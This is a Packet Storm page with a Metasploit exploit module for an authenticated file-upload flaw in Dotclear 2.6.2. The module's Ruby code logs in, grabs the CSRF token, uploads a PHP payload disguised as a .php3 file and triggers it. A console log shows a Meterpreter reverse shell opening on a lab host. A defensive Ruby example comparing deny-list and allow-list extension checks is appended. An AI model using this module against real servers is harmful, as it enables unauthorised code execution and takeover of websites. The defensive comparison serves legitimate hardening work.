Dotclear Media Manager Authenticated Arbitrary File Upload

Posted May 22, 2014
Authored by EgiX, Brandon Perry | Site metasploit.com

This is a Metasploit module that leverages an authenticated arbitrary file upload vulnerability in Dotclear versions 2.6.2 and below.

tags | exploit, arbitrary, file upload
SHA-256 | fa7134cec4517d630b5ea12c4242fbfc9bfb06e0df1b252b0e24e5fa245675a6

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'dotclear Media Manager Authenticated Arbitrary File Upload',
      'Description'    => %q{
        The vulnerability exists because of the filemanager::isFileExclude() method not properly verifying the extension of
        uploaded files. This method just checks whether the uploaded file name matches the "exclude_pattern" regular expression,
        which by default is set to "/\.php$/i". This could be exploited to execute arbitrary PHP code by uploading a file with
        multiple extensions or other extensions (like .php5 or .phtml) which might be handled as PHP scripts. Successful
        exploitation of this vulnerability requires an account with permissions to manage media items.
      },
      'Author'         =>
        [
          'Egidio Romano' # discovery
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['URL', 'http://seclists.org/fulldisclosure/2014/May/108']
        ],
      'Payload'        =>
        {
          'Space'       => 10000, # just a big enough number to fit any PHP payload
          'DisableNops' => true
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'dotclear 2.6.2', { } ],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'May 21 2014'))

    register_options([
      OptString.new('USERNAME', [true, 'The username to authenticate with', 'username']),
      OptString.new('PASSWORD', [true, 'The password to authenticate with', 'password']),
      OptString.new('TARGETURI', [true, 'The full URI path to the instance', '/']),
    ], self.class)
  end

  def check
  end

  def exploit
    post = {
      'user_id'  => datastore['USERNAME'],
      'user_pwd' => datastore['PASSWORD']
    }

    # Authenticate to the admin panel and keep the session cookie it returns
    print_status("Authenticating...")
    res = send_request_cgi({
      'uri'       => normalize_uri(target_uri.path, 'admin', 'auth.php'),
      'method'    => 'POST',
      'vars_post' => post
    })

    if !res or !res.body
      fail_with("Server did not respond in an expected way")
    end

    cookie = res.headers['Set-Cookie']

    # The media manager form carries an anti-CSRF token (xd_check) that must be echoed back
    print_status("Getting xd_check...")
    res = send_request_cgi({
      'uri'    => normalize_uri(target_uri.path, 'admin', 'media.php?popup=1'),
      'cookie' => cookie
    })

    if !res or !res.body
      fail_with("Server did not respond in an expected way")
    end

    res.body =~ /name="xd_check" value="(.*)" \/><input type="hidden" name="d"/

    xd_check = $1

    data = Rex::MIME::Message.new
    filename = Rex::Text::rand_text_alpha(8)

    data.add_part('2097152', nil, nil, 'form-data; name="MAX_FILE_SIZE"')
    data.add_part(xd_check, nil, nil, 'form-data; name="xd_check"')
    data.add_part('', nil, nil, 'form-data; name="upfiletitle"')
    data.add_part('', nil, nil, 'form-data; name="d"')
    data.add_part('<?php ' + payload.encoded + ' ?>', nil, 'text/php', 'form-data; name="upfile[]"; filename="' + filename + '.php3')

    print_status("Sending payload...")
    res = send_request_cgi({
      'uri'    => normalize_uri(target_uri.path, 'admin', 'media.php?pop_up=1&post_id='),
      'method' => 'POST',
      'cookie' => cookie,
      'data'   => data.to_s,
      'ctype'  => 'multipart/form-data; boundary=' + data.bound
    })

    if !res or !res.body
      fail_with("Server did not respond in an expected way")
    end

    # do something with res

    print_status("Popping shell...")
    send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'public', filename + '.php3')
    })
  end
end

__END__
msf exploit(dotclear_file_upload) > show options

Module options (exploit/multi/http/dotclear_file_upload):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   fdsafdsa         yes       The password to authenticate with
   Proxies                     no        Use a proxy chain
   RHOST      192.168.1.114    yes       The target address
   RPORT      80               yes       The target port
   TARGETURI  /dotclear        yes       The full URI path to the instance
   USERNAME   fdsa             yes       The username to authenticate with
   VHOST                       no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   dotclear 2.6.2


msf exploit(dotclear_file_upload) > exploit

[*] Started reverse handler on 192.168.1.31:4444
[*] Authenticating...
[*] Getting xd_check...
[*] Sending payload...
[*] Popping shell...
[*] Sending stage (39848 bytes) to 192.168.1.114
[*] Meterpreter session 1 opened (192.168.1.31:4444 -> 192.168.1.114:33825) at 2014-05-21 18:39:07 -0500

meterpreter > sysinfo
Computer : ubuntu
OS : Linux ubuntu 3.5.0-23-generic #35~precise1-Ubuntu SMP Fri Jan 25 17:15:33 UTC 2013 i686
Meterpreter : php/php
meterpreter >
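The module's Description pins the root cause on a deny-list: filemanager::isFileExclude() only asks whether the file name matches the default "/\.php$/i" pattern, so any other extension the web server maps to PHP, or a name with several extensions, slips through. The Ruby below is an added example, not code from Dotclear or from the Metasploit module above. It places that deny-list check next to an allow-list check that inspects every extension component of the name, and runs both over a set of constructed file names covering the bypass classes the Description lists (.php3, .phtml and multiple extensions). ALLOWED_MEDIA_EXTENSIONS, SAMPLE_UPLOADS and the function names are assumptions made for this example.

```ruby
# Added example (not part of Dotclear or of the Metasploit module on this page).
# Compares the default deny-list extension check described in the module's
# Description with an allow-list check applied to every extension component.
# ALLOWED_MEDIA_EXTENSIONS and SAMPLE_UPLOADS are constructed for this example.

# The default exclusion pattern quoted in the module's Description.
DEFAULT_EXCLUDE_PATTERN = /\.php$/i

# Weak check: a deny-list that only asks "does the name end in .php?".
# Returns true when the upload would be accepted.
def weak_denylist_allows?(filename)
  !DEFAULT_EXCLUDE_PATTERN.match?(filename)
end

# Hardened check: an allow-list of media extensions. Every component after the
# base name must be on the list, so "a.php.jpg" and "a.php3" are both rejected,
# and comparison is case-insensitive so "A.JPG" is still accepted.
ALLOWED_MEDIA_EXTENSIONS = %w[jpg jpeg png gif webp pdf txt].freeze

def hardened_allowlist_allows?(filename)
  # Reject path separators and control characters outright.
  return false if filename.include?('/') || filename.include?("\\")
  return false if filename =~ /[\x00-\x1f]/

  parts = filename.split('.', -1)
  return false if parts.size < 2       # no extension at all
  return false if parts.first.empty?   # dotfile such as ".htaccess"

  exts = parts[1..-1].map(&:downcase)
  return false if exts.any?(&:empty?)  # trailing dot, e.g. "a.jpg."
  exts.all? { |e| ALLOWED_MEDIA_EXTENSIONS.include?(e) }
end

# Constructed sample names covering the cases the Description mentions.
SAMPLE_UPLOADS = %w[photo.jpg PHOTO.JPG shell.php shell.php3 shell.phtml
                    shell.php.jpg noextension .htaccess].freeze

# Returns { filename => [deny_list_result, allow_list_result] } so the two
# policies can be compared side by side.
def compare_policies(names = SAMPLE_UPLOADS)
  names.each_with_object({}) do |n, h|
    h[n] = [weak_denylist_allows?(n), hardened_allowlist_allows?(n)]
  end
end

if __FILE__ == $PROGRAM_NAME
  puts format('%-16s %-9s %-9s', 'filename', 'denylist', 'allowlist')
  compare_policies.each do |name, (weak, hard)|
    puts format('%-16s %-9s %-9s', name, weak ? 'ACCEPT' : 'reject', hard ? 'ACCEPT' : 'reject')
  end
end
```

Running the file prints one row per sample name; the deny-list column accepts everything except the literal .php name, while the allow-list column accepts only the two .jpg variants. The check is still only one layer: storing uploads outside the web root, or serving the upload directory with script execution disabled, removes the dependence on what the web server happens to map to PHP.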


© 2022 Packet Storm. All rights reserved.